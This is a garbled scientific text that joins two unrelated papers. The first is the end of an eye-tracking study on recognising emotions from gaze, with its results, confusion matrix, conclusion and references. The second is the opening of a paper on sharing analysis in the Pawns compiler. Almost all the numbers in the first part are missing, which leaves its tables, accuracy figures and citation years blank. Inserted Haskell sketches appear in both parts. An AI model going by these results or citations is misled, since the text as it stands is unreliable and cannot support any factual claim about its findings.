the first parameter \mu is the mean. the second, \sigma, is the standard deviation. the average distance between gaze fixation points is given in table . the smallest distance between gaze fixation points was estimated from a gaze trajectory when a person was stimulated with a disgust emotional stimulus. the highest jump in distance was generated when a person was stimulated with a shameful emotional stimulus (part of a psychological effect of a person not wanting to be identified). to evaluate the changes of speed in the trajectory of a gaze point, histograms and probability density functions of the gaze point change scale (speed of gazing) are shown in fig. , representing the distribution of the average speed. the speed was evaluated as a pixels-per-frame value which showed how fast the gaze moved from frame to frame. data were calculated from gaze trajectories when participants were stimulated using (a) neutral, (b) disgust, (c) shameful and (d) ‘‘sensory pleasure’’ emotional stimuli. values of the average changes of speed in the gaze trajectory are given in table . positive and negative values show the direction in which the gaze is moving. therefore, a negative value of speed represents only a direction of gazing and how rapidly it changes. the average speed given varies around . this means that the gaze direction is rapidly changing around (mu = ); therefore, the std value is more important here because it represents the distribution of speed. the speed is computed as the location difference between frames, f(t− )−f(t). the speed is defined as a simple sum of differences (see ( )).

figure average histogram and probability density function (top left corner) of distances between gaze fixation points when a person was stimulated with (a) neutral, (b) disgust, (c) shameful and (d) ‘‘sensory pleasure’’ emotional stimuli.

table average changes of speed in the gaze trajectory.
emotion stimuli          average changes in speed (mean ± std), [pixels/frame]
‘‘neutral’’              . ± .
‘‘disgust’’              . ± .
‘‘shameful’’             . ± .
‘‘sensory pleasure’’     − . ± .

positive and negative values show the direction in which the gaze is moving. therefore, a negative value of speed represents only a direction of gazing and how rapidly it changes. the results showed that the smallest speed value was estimated from the gaze trajectory when a person was stimulated with disgusting emotional stimuli. the highest speed values were generated when a person was stimulated with shameful emotional stimuli.
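for concreteness, the quantities just described can be computed as in the following haskell sketch (our own illustration; normalPdf corresponds to the normal pdf above, and speeds to the per-axis frame difference f(t− )−f(t)):

type Point = (Double, Double)

-- euclidean distances between successive gaze fixation points
jumpDistances :: [Point] -> [Double]
jumpDistances ps = zipWith dist ps (tail ps)
  where dist (x1, y1) (x2, y2) = sqrt ((x2 - x1) ^ 2 + (y2 - y1) ^ 2)

-- signed per-frame change along one axis; the sign only encodes the direction of movement
speeds :: [Double] -> [Double]
speeds xs = zipWith (-) xs (tail xs)

-- normal probability density function with mean mu and standard deviation sigma
normalPdf :: Double -> Double -> Double -> Double
normalPdf mu sigma x =
  exp (negate ((x - mu) ^ 2) / (2 * sigma ^ 2)) / (sigma * sqrt (2 * pi))

histograms of jumpDistances and speeds over a recorded trajectory give the distributions whose means and standard deviations are reported in the tables above.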
an average distribution in the results of people clearly illustrates that movement speeds were quite consistent and varied only during playback of ‘‘shameful’’ content. the acceleration increased when our test subject experienced ‘‘strong’’ emotions or was very interested in the information shown during the time-frame on screen. a value close to zero ( ) indicates that a person is focused for the moment (the gaze does not move or the movement is minor). negative and positive values are ‘‘fluctuations’’ to another point of interest on screen.

figure average histogram and probability density function (top left corner) of changes in speed of a gaze point when a person was stimulated with (a) neutral, (b) disgust, (c) shameful and (d) ‘‘sensory pleasure’’ emotional stimuli.

table average confusion matrix.
emotion                  ‘‘neutral’’    ‘‘disgust’’    ‘‘shameful’’    ‘‘sensory pleasure’’
‘‘neutral’’              .              .              .               .
‘‘disgust’’              .              .              .               .
‘‘shameful’’             .              .              .               .
‘‘sensory pleasure’’     .              .              .               .

table illustrates the averaged confusion matrix (acm) for all participants. the average classification accuracy is . and the false positive rate is . . the measured misclassification value was similar for every emotion. figure illustrates the relationship between classification accuracy and the number of feature samples. the number of feature samples is represented on the horizontal axis and the achieved accuracy value is represented on the vertical axis. curves of different colors represent the results for different emotional states. a total of s of gaze ‘‘recordings’’ (approximately samples on average) are necessary to achieve a ± . % recognition accuracy of a specific emotional state. the functional curves represent the average classification accuracy for all participants (combined).

figure relationship curves between classification accuracy and recorded samples used per classification feature (person dependent mode).

figure relationship curves between classification accuracy and recorded samples used per classification feature (person independent mode).

the largest changes in the human visual mechanism that relate to an emotion are generated at the very beginning of emotional stimulation. the more samples we use (frames * (d, x, y, v)), the more information we give to the nn, which might not necessarily accurately represent a certain emotion. figure shows person independent recognition performance, achieved by training the ann with the emotional profiles of people and using the measured profiles of the remaining persons for the overall person-independent recognition accuracy evaluation. in person independent mode, the best overall accuracy of . ± . % was achieved using samples; in comparison, at samples we measured only . ± . % overall recognition accuracy. discussion and conclusion the experiments have shown that each participant reacts differently to emotionally stimulating videos and that the reaction or emotional response strongly correlates with the cognitive perception, motivation and individual life experience of that person. attention concentration maps proved to be very different for each visual stimulus.
a certain person’s emotional state was recognized with a ∼ % of accuracy within an acceptable range of around meter (eye-to-camera). approximately s (∼ samples per feature) of measurements were needed to recognize a specific emotional state with a ± . % recognition error. the recognition error increased rapidly when fewer samples were used. ‘‘disgust’’ emotional state was recognized with a highest recognition rate of . ± . %. in this case, a clear distinction was noticed in a decreased (smaller than average) pupil’s size and a smaller distribution of the attention concentration maps. a ‘‘neutral’’ emotional state was recognized worst with a ± . % recognition error. compared to our previous works (raudonis et al., ; raudonis, ) where a close- to-eye gaze-tracker (mounted on glasses) and a comparable method of testing/algorithm was used, we have achieved a comparable result. recognition accuracy also ranged in the interval from to %, depending on a specific person and a certain emotion. a somewhat better recognition accuracy of the current remote eye tracker could also be contributed to an improved algorithm and (likely) to different hardware. the future possibility of accurately determining an emotion without per-user gaze- tracker pre-calibration is very daunting (wang, wang & ji, ; alnajar et al., ). in a person independent mode we were able to achieve the best overall accuracy of . ± . % using samples. ongoing investigation will naturally involve the rest of the main emotion group, and possibly other classification algorithms and methods. we are going to combine visual/audio stimuli with things you can touch and smell to better provoke the effect. we also aim at revisiting our previous experiments with a close-to-eye gaze-tracker to verify if renewed algorithms have had a noticeable effect on the overall recognition accuracy. acknowledgements authors would like to thank giedre dregvaite for organizational help and administrative support over the course of experiments. maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • rytis maskeliunas and vidas raudonis conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): research on human subjects was approved by an institutional review board of kaunas university of technology (document # - - ). data availability the following information was supplied regarding data availability: the raw data has been supplied as data s . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references al-omar d. . emotional intelligence screening: detecting emotional arousal in non- communicative individuals. msc report. college of computer and information sciences, king saud university. al-omar d, al-wabil a, fawzi m. . using pupil size variation during visual emo- tional stimulation in measuring affective states of non communicative individuals. in: universal access in human-computer interaction. 
user and context diversity. lecture notes in computer science, vol. . berlin heidelberg: springer, – . alnajar f, gevers t, valenti r, ghebreab s. . calibration-free gaze estimation using human gaze patterns. in: proceedings of the ieee international conference on computer vision. piscataway: ieee, – . bal e, harden e, lamb d, van hecke av, denver jw, porges sw. . emotion recognition in children with autism spectrum disorders: relations to eye gaze and autonomic state. journal of autism and developmental disorders ( ): – . beatty j, lucero-wagoner b. . the pupillary system. cambridge: cambridge university press, – . maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. bee n, andré e, tober s. . breaking the ice in human-agent communication: eye- gaze based initiation of contact with an embodied conversational agent. in: lecture notes in computer science, vol. . berlin heidelberg: springer, – . budimir s, palmovic m. . gaze differences in processing pictures with emotional content. collegium antropologicum ( ): – . calandra dm, di mauro d, d’auria d, cutugno f. . e.y.e. c. u.: an emotional eye tracker for cultural heritage support. in: empowering organizations. lecture notes in information systems and organisation, vol. . berlin heidelberg: springer, – . calvo mg, lang pj. . gaze patterns when looking at emotional pictures: motivation- ally biased attention. motivation and emotion ( ): – doi . /b:moem. . .ed. christianson sa, loftus ef, hoffman h, loftus gr. . eye fixations and memory for emotional events. journal of experimental psychology: learning, memory, and cognition ( ): – doi . / - . . . . d’mello s, olney a, williams c, hays p. . gaze tutor: a gaze-reactive intelligent tutoring system. international journal of human-computer studies ( ): – doi . /j.ijhcs. . . . duque a, sanchez a, vazquez c. . gaze-fixation and pupil dilation in the processing of emotional faces: the role of rumination. cognition and emotion ( ): – doi . / . . . ekman p. . basic emotions. in: dalgleish t, power t, eds. (pdf). the handbook of cognition and emotion. sussex: john wiley & sons, ltd., – . hess eh. . the tell-tale eye: how your eyes reveal hidden thoughts and emotions. oxford: van nostrand reinhold, p. iskander dr, collins mj, mioschek s, trunk m. . automatic pupillometry from digital images. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . kappas a, krämer nc. . face-to-face communication over the internet: emotions in a web of culture, language, and technology (studies in emotion and social interaction). cambridge: cambridge university press, p. kuhn g, tipples j. . increased gaze following for fearful faces. it depends on what you’re looking for! psychonomic bulletin & review ( ): – doi . /s - - - . lanatà a, valenza g, scilingo ep. . eye gaze patterns in emotional pictures. journal of ambient intelligence and humanized computing ( ): – doi . /s - - - . lance bj, marsella sc. . a model of gaze for the purpose of emotional expression in virtual embodied agents. in: proceedings of the th international joint conference on autonomous agents and multiagent systems, vol. , – . lu h, lu s, yang g. . robust eye tracking in video sequence. journal of circuits, systems, and computers ( ): – . maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://dx.doi.org/ . /b:moem. . .ed http://dx.doi.org/ . / - . . . http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. murphya na, isaacowitza dm. . age effects and gaze patterns in recognising emotional expressions: an in-depth look at gaze measures and covariates. cognition and emotion. ( ): – doi . / . nguyen ht, isaacowitz dm, rubin pa. . age- and fatigue-related markers of human faces: an eye-tracking study. ophthalmology ( ): – doi . /j.ophtha. . . . nummenmaa l, hyönä j, calvo mg. . eye movement assessment of selective attentional capture by emotional pictures. emotion ( ): – . plutchik r. . the nature of emotions. american scientist : – . raudonis v. . agne paulauskaite-taraseviciene, rytis maskeliunas., vision enhance- ment technique based on eye tracking system. in: exploring the abyss of inequalities. communications in computer and information science, vol. , – . raudonis v, dervinis g, vilkauskas a, kersulyte g. . evaluation of human emotion from eye motions. ijacsa ( ): – . ringeval f, sonderegger a, noris b, billard a, sauer j, lalanne d. . on the influence of emotional feedback on emotion awareness and gaze behavior affective computing and intelligent interaction. in: humaine association conference on affective computing and intelligent interaction (acii). – . roche l, roche b. . seeing people eye to eye. the tampa tribune. available at http://www.highlandstoday.com/news/agri-leader/ /oct/ /seeing-people-eye- eye-ar- / . soleymani m, lichtenauer j, pun t, pantic m. . a multimodal database for affect recognition and implicit tagging. affective computing, ieee transactions on ( ): – doi . /t-affc. . . soleymani m, pantic m, pun t. . multimodal emotion recognition in response to videos. affective computing, ieee transactions on ( ): – doi . /t-affc. . . stanley jt, zhang x, fung hh, isaacowitz dm. . cultural differences in gaze and emotion recognition: americans contrast more than chinese. emotion ( ): – doi . /a . tubbs s. . human communication: principles and contexts. th edition. new york: mcgraw-hill, p. urry hl. . seeing, thinking, and feeling: emotion-regulating effects of gaze-directed cognitive reappraisal. emotion ( ): – doi . /a . viola p, jones mj. . robust real-time face detection. international journal of cumputer vision ( ): – doi . /b:visi. . .fb. wang k, wang s, ji q. . deep eye fixation map learning for calibration-free eye gaze tracking. in: proceedings of the ninth biennial acm symposium on eye tracking research & applications. new york: acm, – . maskeliunas and raudonis ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /j.ophtha. . . http://www.highlandstoday.com/news/agri-leader/ /oct/ /seeing-people-eye-eye-ar- / http://www.highlandstoday.com/news/agri-leader/ /oct/ /seeing-people-eye-eye-ar- / http://dx.doi.org/ . /t-affc. . http://dx.doi.org/ . /t-affc. . http://dx.doi.org/ . /a http://dx.doi.org/ . /a http://dx.doi.org/ . /b:visi. . .fb http://dx.doi.org/ . /peerj-cs. sharing analysis in the pawns compiler submitted march accepted august published september corresponding author lee naish, lee@unimelb.edu.au academic editor evelyn duesterwald additional information and declarations can be found on page doi . /peerj-cs. copyright naish distributed under creative commons cc-by . 
open access sharing analysis in the pawns compiler lee naish computing and information systems, university of melbourne, melbourne, australia abstract pawns is a programming language under development that supports algebraic data types, polymorphism, higher order functions and “pure” declarative programming. it also supports impure imperative features including destructive update of shared data structures via pointers, allowing significantly increased efficiency for some operations. a novelty of pawns is that all impure “effects” must be made obvious in the source code and they can be safely encapsulated in pure functions in a way that is checked by the compiler. execution of a pure function can perform destructive updates on data structures that are local to or eventually returned from the function without risking modification of the data structures passed to the function. this paper describes the sharing analysis which allows impurity to be encapsulated. aspects of the analysis are similar to other published work, but in addition it handles explicit pointers and destructive update, higher order functions including closures and pre- and post-conditions concerning sharing for functions. subjects programming languages keywords functional programming language, algebraic data type, destructive update, mutability, effects, aliasing analysis, sharing analysis introduction this paper describes the sharing analysis done by the compiler for pawns (naish, ), a programming language that is currently under development. pawns supports both declarative and imperative styles of programming. it supports algebraic data types, polymorphism, higher order programming and “pure” declarative functions, allowing very high level reasoning about code. it also allows imperative code, where programmers can consider the representation of data types, obtain pointers to the arguments of data constructors and destructively update them. such code requires the programmer to reason at a much lower level and consider aliasing of pointers and sharing of data structures. low level “impure” code can be encapsulated within a pure interface and the compiler checks the purity. this requires analysis of pointer aliasing and data structure sharing, to distinguish data structures that are only visible to the low level code (and are therefore safe to update) from data structures that are passed in from the high level code (for which update would violate purity). the main aim of pawns is to get the benefits of purity for most code but still have the ability to write some key components using an imperative style, which can significantly improve efficiency (for example, a more than twenty-fold increase in the speed of inserting an element into a binary search tree). there are other functional programming languages, such as ml (milner, tofte & macqueen, ), haskell (jones et al., ) and disciple (lippmeier, ), that allow destructive update of shared data structures but do not allow this impurity to be how to cite this article naish ( ), sharing analysis in the pawns compiler. peerj comput. sci. :e ; doi . /peerj-cs. mailto:lee@unimelb.edu.au https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. encapsulated. 
in these languages, the ability to update the data structure is connected to its type. for a data structure to be built using destructive update, its type must allow disciple uses “region” information to augment types, with similar consequences. destructive update and any code that uses the data structure can potentially update it as well. this prevents simple declarative analysis of the code and can lead to a proliferation of different versions of a data structure, with different parts being mutable. for example, there are four different versions of lists, since both the list elements and the “spine” may (or may not) be mutable, and sixteen different versions of lists of pairs. there is often an efficiency penalty as well, with destructive update requiring an extra level of indirection in the data structure (an explicit “reference” in the type with most versions of ml and haskell). pawns avoids this inefficiency and separates mutability from type information, allowing a data structure to be mutable in some contexts and considered “pure” in others. the main cost from the programmer perspective is the need to include extra annotations and information in the source code. this can also be considered a benefit, as it provides useful documentation and error checking. the main implementation cost is additional analysis done by the compiler, which is the focus of this paper. the rest of this paper assumes some familiarity with haskell and is structured as follows. ‘an overview of pawn’ gives a brief overview of the relevant features of pawns. an early pass of the compiler translates pawns programs into a simpler “core” language; this is described in ‘core pawns.’ ‘the abstract domain’ describes the abstract domain used for the sharing analysis algorithm, ‘the sharing analysis algorithm’ defines the algorithm itself and ‘example’ gives an extended example. ‘discussion’ briefly discusses precision and efficiency issues. ‘related work’ discusses related work and ‘conclusion’ concludes. an overview of pawns a more detailed introduction to pawns is given in (naish, ). pawns has many similarities with other functional languages. it supports algebraic data types with parametric polymorphism, higher order programming and curried function definitions. it uses strict evaluation. in addition, it supports destructive update via “references” (pointers) and has a variety of extra annotations to make impure effects more clear from the source code and allow them to be encapsulated in pure code. pawns also supports a form of global variables (called state variables) which support encapsulated effects, but we do not discuss them further here as they are handled in essentially the same way as other variables in sharing analysis. pure code can be thought of in a declarative way, where values can be viewed abstractly, without considering how they are represented. code that uses destructive update must be viewed at a lower level, considering the representation of values, including sharing. we discuss this lower level view first, then briefly present how impurity can be encapsulated to support the high level view. we use haskell-like syntax for familiarity. the low level view values in pawns are represented as follows. constants (data constructors with no arguments) are represented using a value in a single word. a data constructor with n > arguments is represented using a word that contains a tagged pointer to a block of n words naish ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in main memory containing the arguments. for simple data types such as lists, the tag may be empty. in more complex cases, some bits of the pointer may be used and/or a tag may be stored in a word in main memory along with the arguments. note that constants and tagged pointers are not always stored in main memory and pawns variables may correspond to registers that contain the value. only the arguments of data constructors are guaranteed to be in main memory. an array of size n is represented in the same way as a data constructor with n arguments, with the size given by the tag. functions are represented as either a constant (for functions that are known statically) or a closure which is a data constructor with a known function and a number of other arguments. pawns has a ref t type constructor, representing a reference/pointer to a value of type t (which must be stored in memory). conceptually, we can think of a corresponding ref data constructor with a single argument, but this is never explicit in pawns code. instead, there is an explicit dereference operation: *vp denotes the value vp points to. there are two ways references can be created: let bindings and pattern bindings. a let binding *vp = val allocates a word in main memory, initializes it to val and makes vp a reference to it (pawns omits haskell’s let and in keywords; the scope is the following sequence of statements/expressions). in a pattern binding, if *vp is the argument of a data constructor pattern, vp is bound to a reference to the corresponding argument of the data constructor if pattern matching succeeds (there is also a primitive that returns a reference to the ith element of an array). note it is not possible to obtain a reference to a pawns variable: variables do not denote memory locations. however, a variable vp of type ref t denotes a reference to a memory location containing a value of type t and the memory location can be destructively updated by *vp := val. consider the following code. two data types are defined. the code creates a reference to nil (nil is stored in a newly allocated memory word) and a reference to that reference (a pointer to the word containing nil is put in another allocated word). it also creates a list containing constants blue and red (requiring the allocation of two cons cells in memory; the nil is copied). it deconstructs the list to obtain pointers to the head and tail of the list (the two words in the first cons cell) then destructively updates the head of the list to be red. data colour = red | green | blue data colours = nil | cons colour colours -- like [colour] ... *np = nil -- np = ref to (copy of) nil *npp = np -- npp = ref to (copy of) np cols = cons blue (cons red *np) -- cols = [blue, red] case cols of (cons *headp *tailp) -> -- get ref to head and tail *headp := red -- update head with red naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the memory layout after the assignment can be pictured as follows, where boxes represent main memory words and ref and cons followed by an arrow represent pointers (no tag is used in either case): the destructive update above changes the values of both headp and cols (the representations are shared). one of the novel features of pawns is that the source code must be annotated with “!” to make it obvious when each “live” variable is updated. 
if both headp and cols are used later, the assignment statement above must be written as follows, with headp prefixed with “!” and an additional annotation attached to the whole statement indicating cols may be updated: *!headp := red !cols -- update *headp (and cols) we say that the statement directly updates headp and indirectly updates cols, due to sharing of representations. similarly, if headp was passed to a function that may update it, additional annotations are required. for example, (assign !headp red) !cols makes the direct update of headp and indirect update of cols clear. sharing analysis is used to ensure that source code contains all the necessary annotations. one aim of pawns is that any effects of code should be made clear by the code. pawns is an acronym for pointer assignment with no surprises. pawns functions have extra annotations in type signatures to document which arguments may be updated. for additional documentation, and help in sharing analysis, there are annotations to declare what sharing may exist between arguments when the function is called (a precondition) and what extra sharing may be added by executing the function (called a postcondition, though it is the union of the pre- and post-condition that must be satisfied after a function is executed). for example, we may have: assign :: ref t -> t -> () sharing assign !p v = _ -- p may be updated pre nosharing -- p&v don’t share when called post *p = v -- assign may make *p alias with v assign !p v = *!p := v the “!” annotation on parameter p declares the first argument of assign is mutable. the default is that arguments are not mutable. as well as checking for annotations on assignments and function calls, sharing analysis is used to check that all parameters which may be updated are declared mutable in type signatures, and pre- and post-conditions are always satisfied. for example, assuming the previous code which binds cols, the call assign !tailp !cols annotates all modified variables but violates the precondition naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. of assign because there is sharing between tailp and cols at the time of the call. violating this precondition allows cyclic structures to be created, which is important for understanding the code. if the precondition was dropped, the second argument of assign would also need to be declared mutable in the type signature and the assignment to p would require v to be annotated. in general, there is an inter-dependence between “!” annotations in the code and pre- and post-conditions. more possible sharing at a call means more “!” annotations are needed, more sharing in (recursive) calls and more sharing when the function returns. curried functions and higher order code are supported by attaching sharing and destructive update information to each arrow in a type, though often the information is inferred rather than being given explicitly in the source code. for example, implicit in the declaration for assign above is that assign called with a single argument of type ref t creates a closure of type t ->() containing that argument (and thus sharing the object of type t). the explicit sharing information describes applications of this closure to another argument. there is a single argument in this application, referred to with the formal parameter v. the other formal parameter, p, refers to the argument of the closure. 
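as a side note, the role of closure arguments in sharing can be modelled in plain haskell with iorefs (this is our own illustration, not pawns code): partially applying a function to a reference produces a closure that captures the reference, so any later application updates the same cell that the original variable (and anything aliasing it) points to.

import Data.IORef

-- haskell analogue of assign: write the value into the referenced cell
assignRef :: IORef a -> a -> IO ()
assignRef p v = writeIORef p v

main :: IO ()
main = do
  p <- newIORef (0 :: Int)
  let setP = assignRef p      -- closure capturing p: it shares the cell *p
  setP 42                     -- applying the closure updates *p as well
  readIORef p >>= print       -- prints 42

this sharing between a closure and the variables it captures is what the closure parameter p in the sharing declaration for assign describes.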
in general, a type with n arrows in the “spine” has k + n formal parameters in the description of sharing, with the first k parameters being closure arguments. the following code defines binary search trees of integers and defines a function that takes a pointer to a tree and inserts an integer into the tree. it uses destructive update, as would normally be done in an imperative language. the declarative alternative must reconstruct all nodes in the path from the root down to the new node. experiments using our prototype implementation of pawns indicate that for long paths this destructive update version is as fast as hand-written c code whereas the “pure” version is more than twenty times slower, primarily due to the overhead of memory allocation. data tree = tnil | node tree int tree bst_insert_du :: int -> ref tree -> () sharing bst_insert_du x !tp = _ -- tree gets updated pre nosharing -- integers are atomic so post nosharing -- it doesn’t share bst_insert_du x !tp = case *tp of tnil -> *!tp := node tnil x tnil -- insert new node (node *lp n *rp) -> if x <= n then (bst_insert_du x !lp) !tp -- update lp (and tp) else (bst_insert_du x !rp) !tp -- update rp (and tp) naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the high level view whenever destructive update is used in pawns, programmers must be aware of potential sharing of data representations and take a low-level view. in other cases, it is desirable to have a high level view of values, ignoring how they are represented and any sharing that may be present. for example, in the two trees t and t depicted below, it is much simpler if we do not have to care or know about the sharing between the trees and within tree t . the high level view is they are both just node (node tnil tnil) (node tnil tnil). pawns has a mechanism to indicate that the high level view is taken. pre- and post-conditions can specify sharing with a special pseudo-variable named abstract. the there is conceptually a different abstract variable for each distinct type. sharing analysis of the pawns compiler allows a distinction between “abstract” variables, which share with abstract and for which the programmer takes a high level view, and “concrete” variables for which the programmer must understand the representation and explicitly declare all sharing in pre- and post-conditions. the analysis checks that no live abstract variables can be destructively updated. thus, if a function has a parameter which is updated, it must be declared mutable and must not be declared to share with abstract in the precondition (non-mutable parameters may or may not share with abstract). checking of preconditions ensures that abstract variables are not passed to functions which expect concrete data structures. for example, an abstract tree cannot be passed to bst insert du because the precondition allows no sharing with abstract. it is important that the tree structure is known when bst insert du is used because the result depends on it. for example, inserting into the right subtree of t only affects this subtree whereas inserting into the right subtree of t (which has the same high level value) also changes the left subtree of both t and t . note that concrete variables can be passed to functions which allow abstract arguments. 
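for comparison, a haskell version of the ‘‘pure’’ alternative mentioned above looks roughly as follows (our own sketch, not taken from the paper); every node on the path from the root to the insertion point is rebuilt, which is the main source of the slowdown relative to bst_insert_du:

data Tree = TNil | Node Tree Int Tree

bstInsert :: Int -> Tree -> Tree
bstInsert x TNil = Node TNil x TNil          -- allocate a new leaf node
bstInsert x (Node l n r)
  | x <= n    = Node (bstInsert x l) n r     -- left subtree rebuilt, this node reallocated
  | otherwise = Node l n (bstInsert x r)     -- right subtree rebuilt, this node reallocated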
pawns type signatures that have no annotations concerning destructive update or sharing implicitly indicate no arguments are destructively updated and the arguments and result share with abstract. thus, a subset of pawns code can look like and be considered as pure functional code. the following code defines a function that takes a list of integers and returns a binary search tree containing the same integers. though it uses destructive update internally, this impurity is encapsulated and it can therefore be viewed as a pure function. the list that is passed in as an argument is never updated and the tree returned is abstract so it is never subsequently updated (a concrete tree could be returned if an explicit postcondition without t = abstract was given). an initially empty tree is created locally. it is destructively updated by inserting each integer of the list into it (using list bst du, which calls bst insert du), then the tree is returned. within the execution of list bst naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. it is important to understand the low level details of how the tree is represented, but this information is not needed outside the call. data ints = nil | cons int ints list_bst :: ints -> tree -- pure function from ints to tree -- implicit sharing information: -- sharing list_bst xs = t -- pre xs = abstract -- post t = abstract list_bst xs = *tp = tnil -- create pointer to empty tree list_bst_du xs !tp -- insert integers into tree *tp -- return (updated) tree list_bst_du :: ints -> ref tree -> () sharing list_bst_du xs !tp = _ -- tree gets updated pre xs = abstract post nosharing list_bst_du xs !tp = case xs of (cons x xs ) -> bst_insert_du x !tp -- insert head of list into tree list_bst_du xs !tp -- insert rest of list into tree nil -> () core pawns an early pass of the pawns compiler converts all function definitions into a core language by flattening nested expressions, introducing extra variables et cetera. a variable represent- ing the return value of the function is introduced and expressions are converted to bindings for variables. a representation of the core language version of code is annotated with type, liveness and other information prior to sharing analysis. we just describe the core language here. the right side of each function definition is a statement (described using the definition of type stat below), which may contain variables, including function names (var), data constructors (dcons) and pairs containing a pattern (pat) and statement for case statements. all variables are distinct except for those in recursive instances of stat and variables are renamed to avoid any ambiguity due to scope. data stat = -- statement, eg seq stat stat | -- stat ; stat eqvar var var | -- v = v eqderef var var | -- v = *v naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. derefeq var var | -- *v = v dc var dcons [var] | -- v = cons v v case var [(pat, stat)] | -- case v of pat -> stat ... error | -- (for uncovered cases) app var var [var] | -- v = f v v assign var var | -- *!v := v instype var var -- v = v ::instance_of_v _type data pat = -- patterns for case, eg pat dcons [var] -- (cons *v *v ) patterns in the core language only bind references to arguments — the arguments themselves must be obtained by explicit dereference operations. 
pawns supports “default” patterns but for simplicity of presentation here we assume all patterns are covered in core pawns and we include an error primitive. similarly, we just give the general case for application of a variable to n > arguments; our implementation distinguishes some special cases. memory is allocated for derefeq, dc (for non-constants) and app (for unsaturated applications which result in a closure). the runtime behaviour of instype is identical to eqvar but it is treated differently in type analysis. sharing and type analysis cannot be entirely separated. destructive update in the presence of polymorphic types can potentially violate type safety or “preservation”— see wright ( ), for example. for a variable whose type is polymorphic (contains a type variable), we must avoid assigning a value with a less general type. for example, in *x = [] the type of *x is “list of t”, where t is a type variable. without destructive update, it should be possible to use *x wherever a list of any type is expected. however, if *x is then assigned a list containing integers (which has a less general type), passing it to a function that expects a list of functions violates type safety (“calling” an arbitrary integer is not safe). pawns allows expressions to have their inferred types further instantiated using “::”, and the type checking pass of the compiler also inserts some type instantiation. the type checking pass ensures that direct update does not involve type instantiation but to improve flexibility, indirect update is checked during the sharing analysis. the abstract domain the representation of the value of a variable includes some set of main memory words (arguments of data constructors). two variables share if the intersection of their sets of main memory words is not empty. the abstract domain for sharing analysis must maintain a conservative approximation to all sharing, so we can tell if two variables possibly share (or definitely do not share). the abstract domain we use is a set of pairs (representing possibly intersecting sets of main memory locations) of variable components. the different components of a variable partition the set of main memory words for the variable. the components of a variable depend on its type. for non-recursive types other than arrays, each possible data constructor argument is represented separately. for example, the type maybe (maybe (either int int)) can have an argument of an outer just naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. data constructor, an inner just and left and right. a component can be represented using a list of x.y pairs containing a data constructor and an argument number, giving the path from the outermost data constructor to the given argument. for example, the components of the type above can be written as: [just. ], [just. ,just. ], [just. ,just. ,left. ] and [just. ,just. ,right. ]. if variable v has value just nothing, the expression v.[just. ] represents the single main memory word containing the occurrence of nothing. for ref t types we proceed as if there was a ref data constructor, so vp.[ref. ] represents the word vp points to. for function types, values may be closures. a closure that has had k arguments supplied is represented as a data constructor clk with these k arguments; these behave in the same way as other data constructor arguments with respect to sharing, except pawns provides no way to obtain a pointer to a closure argument. 
closures also contain a code pointer and an integer which are not relevant to sharing so they are ignored in the analysis. we also ignore the subscript on the data constructor for sharing analysis because type and sharing analysis only give a lower bound on the number of closure arguments. our analysis orders closure arguments so that the most recently supplied argument is first (the reverse of the more natural ordering). consider the code below, where foo is a function that is defined with four or more arguments. the sharing analysis proceeds as if the memory layout was as depicted in the diagram. the pre- and post-conditions of foo are part of the type information associated with c , c and c . for arrays, [array . ] is used to represent all words in the array. the expression, x.[array . ,just. ] represents the arguments of all just elements in an array x of maybe values. for recursive types, paths are “folded” (bruynooghe, ) so there are a finite number of components. if a type t has sub-component(s) of type t we use the empty path to denote the sub-component(s). in general, we construct a path from the top level and if we come across a sub-component of type t that is in the list of ancestor types (the top level type followed by the types of elements of the path constructed so far) we just use the path to the ancestor to represent the sub-component. consider the following mutually recursive types that can be used to represent trees which consist of a node containing an integer and a list of sub-trees: data rtrees = nil | cons rtree rtrees data rtree = rnode int rtrees for type rtrees we have the components [] (this folded path represents both [cons. ] and [cons. ,rnode. ], since they are of type rtrees), [cons. ] and [cons. ,rnode. ]. the expression t.[cons. ,rnode. ] represents the set of naish ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. memory words that are the first argument of rnode in variable t of type rtrees. for type rtree we have the components [] (for [rnode. ,cons. ], of type rtree), [rnode. ] and [rnode. ] (which is also the folded version of [rnode. ,cons. ], of type rtrees). in our sharing analysis algorithm we use a function fc (fold component) which takes a v.c pair, 